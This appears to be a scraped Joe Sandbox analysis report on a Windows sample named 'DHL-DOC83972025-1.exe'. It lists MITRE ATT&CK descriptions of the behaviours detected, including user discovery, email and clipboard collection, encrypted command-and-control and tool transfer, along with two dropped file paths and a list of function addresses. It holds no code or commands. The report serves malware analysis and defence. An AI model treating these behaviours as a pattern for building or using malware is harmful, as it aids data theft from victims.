Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report DHL-DOC83972025-1.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\F56GKLK7U4

C:\Users\user\AppData\Local\Temp\caulds

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Possible Origin

Windows Analysis Report
DHL-DOC83972025-1.exe

Function 003F42DE Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235
libraryloaderCOMMON

Function 003F42A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Function 00432BA5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62
COMMON

Function 003F2CD4 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Function 0043065B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Function 003F344D Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Function 003F2B83 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63
windowregistryCOMMON

Function 003F3170 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145
windowtimeregistryCOMMON

Function 011864D0 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Function 003F2C63 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Function 01186290 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 149
fileCOMMON

Function 003F3B1C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58
registryCOMMON

Function 01185180 Relevance: 6.7, APIs: 4, Instructions: 720
processthreadCOMMON

Function 003F3923 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94
windowCOMMON

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre